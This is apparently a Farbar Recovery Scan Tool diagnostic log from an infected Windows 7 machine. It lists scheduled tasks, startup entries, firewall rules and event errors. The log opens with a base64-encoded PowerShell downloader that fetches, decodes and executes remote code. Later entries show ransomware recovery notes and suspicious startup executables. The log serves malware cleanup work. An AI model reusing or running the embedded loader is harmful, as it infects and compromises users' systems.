A4ADcAMgBsAEoARwB3AHUAZQBKAGIAcgB3AGMAegBSAFoAegBjAFkAZgBZAGUAMQA1AEIATQBIAFUAOQBCAGYAdgAtAHUAYgA1AEQAVAA2AEUAZQBhAFQAXwBUAE8AOQBmAFQAWgBBAGwATwBVAGUARwBUAHAAYwBhAE4AVABrAEIAcQBGAG4ANQBMAHoASQBzADcAeABWADcAcABNADEAcgBnAEMAdABNAFIAMwB3AHMAZQBjAGsAVABxAGQARwBLAE8ANwBYAFoAYgBSAGcANgBOAHMATQBiAHYAMQA4AG8ATAB0AFoASABEAEcAVgBjAG8AXwBWAGMASQAzAHQARwB6ADIATwBwAHoAaQBZAEgAWgBpAEYAOQBmAEgAagBrAFAATABFADAANgBEADEANQAxADkAVAAyAGMAVQBCADcAcABzAFoAUQA2AGsAawBpAGoAeAB5AEoAVQAwAHYAeABfAFUAUwB6AFMAYwBmAHEAcQAtAGIARgBCAEEATQBlAEsAWgB3AHYAbQBtAGEAaABtAE8AQwBRAFQARQB0AFkAZwBPAFoAVAB4AEIAbAAtAHcAMQB4AFUAdQB0AEwAbQBfAFYAZwA3ADkAUgBuAGUATwBtAG0AdgBzAGsAVAAwADIASwBEAEEASABvAGUAdwBGADIAcgBaAGIARABSAEwAOQBjADkAeABOAEQAaABDAFEAdABIADcAZABUAGUASAAyAHQANQBSAHYAYgAtAEYAawBLAFgARQBYADcASgBtAHYAYwAxAG0AQgBxADQAXwBGAGcAMwBkAEsASgBSAHEAMAAwAEkASwBIAEIAYgBxAEcAZAA0AHkAUABhAEsAZgBZAEIAbwAzAEcAeQBRAHMAZwB2AGkANAAxAEEASwBvAFMAVQBrAEoAaABGAEYAYQBVAFUAWABBAFQAMQBxAEYALQB6AGkANAB6AFUASwB5AHEAegBxAHAAbgBOAGgAZQBUAHMAZABhAGkAUgB6AEoAegBsAGQAVAB2ADgAUQBfAHEAWgBiAEYASABrAFMATQBQAE4AeQA3AGkAcwBwADQAegAzAHgAbQBMAF8AWgBoAGYANABmAFcASwA1AG8AcAAyAGEAUABzAE8AaQBaAFcAVQBoAHoATgBLAGsAYQBiAEgAaQBmAG8AUAA3AFAAUgBvADEAWABSAFgAYwB3AG4AawBxAHoAYwBCAGYASwBUADcAOABNAEgAUwAtAFEAOABXAHQATgBjAHAAegBQAGMAQgBsAHEAWQByAGwAZQBQADcANQBKADIAQwBNAFIASQBfAG8AUwA5ADcASwBiAGcANQBjAHEATAB4AGcAYwBBAFIAdgB6AGcAVABDAFcAeAB5AEwAVwBYAHUAMAA4AHUASwBoAHcAagB5AHgATwA1AHcAMwA3AHYAcgBWADkAcgBoAFMAdgA3AEgAVwB3AEwAJgByAD0AMwAyADMAOQA0ADAANwA3ADIAOQA4ADQAMAA2ADkANAA4ADAAMAAiADsAJABzAHQAcwBrAD0AIgB7ADQARQAzADMARQA5ADcARAAtAEEANQA4AEYALQBGAEMAMwAxAC0AQQAxADIAMQAtADAANQA4ADEANwBFADcANgA3ADgAOQA3AH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {712DEFDF-B057-4BAC-A6A8-41CF7347B7C2} - System32\Tasks\{3D2B6BE3-43F0-4F58-9BAD-67D510E98AE5} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {AFCFED78-558A-433D-82FC-5272703E73E2} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-19] (Adobe Systems Incorporated)
Task: {B82B3AAE-2CBF-446D-87CD-86536713FBF5} - System32\Tasks\SafeZone scheduled Autoupdate 1453592909 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-02-01] (Avast Software)
Task: {BF1752E0-5720-42D8-A292-25428B48DD96} - System32\Tasks\{3C86DAE9-BE7A-4387-923A-52BBD1081558} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {CC425A47-B94E-4B5C-9D94-DD359E3C91EE} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => c:\program files\windows defender\MpCmdRun.exe
Task: {DD99B38D-5597-4369-B3A4-51BFD9AEE884} - System32\Tasks\{7F164935-571D-465F-998B-F8B2690ADC59} => pcalua.exe -a D:\directx9\DXSETUP.exe -d D:\directx9
Task: {EB666DA0-929D-43BC-A6C8-6619BEC730C8} - System32\Tasks\{577E5ED9-FB93-4FE8-BCF6-1156C6AFEBE4} => pcalua.exe -a D:\autorun.exe -d D:\
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Superclean.job => c:\programdata\{ab1529fd-2a26-6967-ab15-529fd2a2a7f4}\hqghumeaylnlf.exe <==== ATTENTION
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2016-02-19 13:25 - 2016-02-19 13:25 - 00113496 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-02-19 13:25 - 2016-02-19 13:25 - 00133768 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-02-19 13:22 - 2016-02-19 13:22 - 02835968 _____ () C:\Program Files\AVAST Software\Avast\defs\16021900\algo.dll
2016-02-19 13:25 - 2016-02-19 13:25 - 00480760 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-01-23 17:55 - 2016-01-23 17:57 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-01-23 17:55 - 2016-01-23 17:55 - 00984576 _____ () C:\Program Files\AVAST Software\Avast\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\Mario\Local Settings:init
AlternateDataStreams: C:\Users\Mario\AppData\Local:init
AlternateDataStreams: C:\Users\Mario\AppData\Local\Application Data:init
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:04 - 2009-06-10 16:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2531867340-1831226124-3850839779-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mario\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 199.203.131.152 - 82.163.143.182
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: Fierce Hour => 2
MSCONFIG\Services: Frothy Manager => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+idw.html => C:\Windows\pss\how_recover+idw.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+idw.txt => C:\Windows\pss\how_recover+idw.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+jor.html => C:\Windows\pss\how_recover+jor.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+jor.txt => C:\Windows\pss\how_recover+jor.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+ooi.html => C:\Windows\pss\how_recover+ooi.html.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^how_recover+ooi.txt => C:\Windows\pss\how_recover+ooi.txt.Startup
MSCONFIG\startupfolder: C:^Users^Mario^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SuperOptimizer.lnk => C:\Windows\pss\SuperOptimizer.lnk.Startup
MSCONFIG\startupreg: ngungok => rundll32 "C:\Users\Mario\AppData\Local\ngungok.dll",ngungok
MSCONFIG\startupreg: NvBackend => "C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: santa_svc => C:\Users\Mario\AppData\Roaming\pwukracroic.exe
MSCONFIG\startupreg: Steam => "C:\Program Files\Steam\Steam.exe" -silent
MSCONFIG\startupreg: {B0B5D425-E780-65A1-7EBB-B0E628A49B00} => C:\Users\Mario\AppData\Roaming\Axpee\ucqil.exe
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{41BC2091-339F-4AFA-8CAB-3EAF080BCB4C}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [{90C6DFC9-B609-4C6F-B303-B6900BEC3CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{33839AF5-77BF-43EC-9D04-4297350F9610}] => (Allow) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{2C590A75-AB46-4CB6-942E-27869C7CB0F8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.524\Agent.exe
FirewallRules: [{4B40A380-6A35-45DE-A26D-375D0D843B00}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.524\Agent.exe
FirewallRules: [{481A392D-4757-4CAB-9FC0-5926B3F28DCA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{6A3A2321-A71F-46CA-9E4D-B67927E3B594}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2816\Agent.exe
FirewallRules: [{B0CB9B61-F005-42F6-B30E-20A50C2F4D23}] => (Allow) C:\Program Files\Battle.net\Battle.net.exe
FirewallRules: [{24D14178-FB6C-4EF7-85F2-DF0DE32049C8}] => (Allow) C:\Program Files\Battle.net\Battle.net.exe
FirewallRules: [{6B104977-813E-4ACE-87A5-C2874EC27340}] => (Allow) C:\Program Files\Diablo III\Diablo III.exe
FirewallRules: [{D2A92C0E-14B4-4DF4-8D00-2BB5AE4E3C4C}] => (Allow) C:\Program Files\Diablo III\Diablo III.exe
FirewallRules: [{7B8A0FFA-8FBA-47C5-8B16-7237D5C3349F}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{1310FE3B-EB60-419E-AE39-E00E326FDFAD}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A37251FD-5AD9-49E0-928E-CC9BE6B692A1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{69A38952-B20C-4684-AECD-3B9455105EFC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
FirewallRules: [{7AC76DCE-BDFD-48A8-96E3-6AA09F15FA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{9E96A28B-C193-4A43-8A30-168531253000}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
FirewallRules: [{053CCA07-28CF-4DE9-99EF-71F174FF0C55}] => (Allow) C:\Program Files\Steam\Steam.exe
FirewallRules: [{2F637BF7-41FC-4692-AD30-2BB729E4DE87}] => (Allow) C:\Program Files\Steam\Steam.exe
FirewallRules: [{9722AFEA-44AF-4722-AA58-B9D0D5CF908C}] => (Allow) C:\Program Files\Steam\bin\steamwebhelper.exe
FirewallRules: [{61D109FF-C4F5-4FA5-B892-7703DEEC623A}] => (Allow) C:\Program Files\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{1C6CF19B-F1BF-4B4A-BAE8-70836A900EA8}C:\programdata\battle.net\agent\agent.3526\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3526\agent.exe
FirewallRules: [UDP Query User{4EB78251-8AAA-4C99-A9FE-16902C36F078}C:\programdata\battle.net\agent\agent.3526\agent.exe] => (Allow) C:\programdata\battle.net\agent\agent.3526\agent.exe
FirewallRules: [{7551BD7B-4F98-4DD6-B382-F2FAB2E4EC5F}] => (Allow) C:\Windows\System32\taskhost.exe
FirewallRules: [{03D8AB22-43C2-4882-A5C1-45A28B13DE06}] => (Allow) C:\Windows\System32\taskhost.exe
FirewallRules: [{43CCB6C1-C8BB-4D9A-8D1A-CA4B07F04934}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{9C1539AC-F7DF-4B05-939B-05A3F78633A9}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [TCP Query User{19AFC1D8-F3CE-428F-92C4-1E986E8C2362}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{FCF99FDC-3F71-4703-949D-F98F2750D1A7}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [{097C319C-B5FA-4287-8E1D-28CA605F48E6}] => (Allow) C:\Program Files\Steam\SteamApps\common\Confrontation\Confrontation.exe
FirewallRules: [{0AB625DE-2C91-4DE9-AB4F-752FAF30AD62}] => (Allow) C:\Program Files\Steam\SteamApps\common\Confrontation\Confrontation.exe
FirewallRules: [TCP Query User{B41FD610-5A3E-4743-A9AD-A6C0A9E05743}C:\users\mario\appdata\local\temp\low\2a9e.tmp] => (Block) C:\users\mario\appdata\local\temp\low\2a9e.tmp
FirewallRules: [UDP Query User{85971E97-704A-4275-9432-C2F099E038B9}C:\users\mario\appdata\local\temp\low\2a9e.tmp] => (Block) C:\users\mario\appdata\local\temp\low\2a9e.tmp
FirewallRules: [TCP Query User{5AC2025E-DE35-414A-9878-BCAED5533786}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [UDP Query User{2122EE27-82B5-44BF-A1E5-3C5422BE74B0}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [TCP Query User{03C4591D-12E8-4C2E-A44E-D39D04F6F801}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [UDP Query User{D0A17B1B-95B3-4A2E-9342-0279D089C250}C:\windows\system32\rundll32.exe] => (Block) C:\windows\system32\rundll32.exe
FirewallRules: [{920ACAB2-75EF-4BE4-84B5-4DE52A0761CC}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
FirewallRules: [{C7E2C546-9571-42B3-8539-B61A3FD14375}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{354A79C5-88D6-4C69-A13E-14F0E1594A3A}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{8399214B-0C43-4E6D-9583-181B2212D2DF}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{A2904C05-75C9-480D-BE9B-E66E48EAAFB7}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{38C0AF95-5237-4242-BD52-74ABF054889D}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{95668487-423A-4B0B-814F-16D10EE0566F}] => (Allow) C:\Users\Mario\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [TCP Query User{1B5D6071-AA90-4BE5-9898-9FBE3FC52AD3}C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe] => (Block) C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe
FirewallRules: [UDP Query User{1B244DA5-5BAD-4156-8420-CD474F34AD25}C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe] => (Block) C:\users\mario\appdata\roaming\bittorrent\updates\7.9.5_41074.exe
FirewallRules: [{63291B65-BDA5-4742-A601-2C2BBDCA9374}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{48003FEB-EFE9-4776-AE05-E9626743FFF4}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{83B9B4AC-9C6E-4401-A878-39DCEC14ACF0}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5E834285-FDFF-47F7-A556-0E24C6E68296}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{40D42DA9-DD78-4CD8-BBA7-120196D56930}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3.exe
FirewallRules: [{AB3269C0-5B3B-47CD-9D56-C8CF295B5FD1}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3.exe
FirewallRules: [{1561505E-5D2F-4C2A-8168-FAA613EC3B56}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3x.exe
FirewallRules: [{1F08F2B5-7410-406E-8223-03A8AF1CC19C}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3x.exe
FirewallRules: [{84A185F4-C868-4F55-AD52-75CF14AB34AF}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3y.exe
FirewallRules: [{5D91920B-C0FD-4886-BF3A-4061368EF1D4}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\age3y.exe
FirewallRules: [{0A380072-65C3-4749-9378-FE053661DCFC}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher.exe
FirewallRules: [{E0B43DB0-7E93-4444-9358-5EBB0E5B591E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher.exe
FirewallRules: [{055ED01D-1D94-4116-9612-1D843A77445A}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher2.exe
FirewallRules: [{ABEB7EB9-C9DC-4C9B-A47F-981DDCE6B42E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcher2.exe
FirewallRules: [{2F95B77E-B5CB-499B-B0A5-F65090B072FB}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcherx.exe
FirewallRules: [{B4FEB05D-3880-4F13-8C09-C70B401C19D2}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatcherx.exe
FirewallRules: [{E14F6955-BAA4-4E1C-9322-22C756C81CCC}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatchery.exe
FirewallRules: [{B4D9C81F-D641-47A0-8416-579ED1B05A0E}] => (Allow) C:\Program Files\Microsoft Games\Age of Empires III\autopatchery.exe
==================== Restore Points =========================
06-02-2016 23:48:09 Scheduled Checkpoint
10-02-2016 16:24:49 DirectX est installé
19-02-2016 13:15:35 Device Driver Package Install: Avast Network Service
19-02-2016 13:27:30 Device Driver Package Install: Avast Network Service
==================== Faulty Device Manager Devices =============
Name: Port série PCI
Description: Port série PCI
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: Microsoft Teredo Tunneling Adapter
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Name: Contrôleur PCI de communications simplifiées
Description: Contrôleur PCI de communications simplifiées
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (02/19/2016 01:12:34 PM) (Source: System Restore) (EventID: 8210) (User: )
Description: Une erreur non spécifiée s’est produite au cours de la restauration du système : (Scheduled Checkpoint). Informations supplémentaires : 0xc0000022.
Error: (02/19/2016 12:48:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x8e4
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:48:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x9a8
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:46:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0xec4
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:45:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x820
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:45:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0x854
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:44:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x655c9617
Décalage d’erreur : 0x00009617
ID du processus défaillant : 0xd4c
Heure de début de l’application défaillante : 0xexplorer.exe0
Chemin d’accès de l’application défaillante : explorer.exe1
Chemin d’accès du module défaillant: explorer.exe2
ID de rapport : explorer.exe3
Error: (02/19/2016 12:37:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante explorer.exe, version : 6.1.7600.16385, horodatage : 0x4a5bc60d
Nom du module défaillant : KERNELBASE.dll, version : 6.1.7600.16385, horodatage : 0x4a5bdaae
Code d’exception : 0x65929617
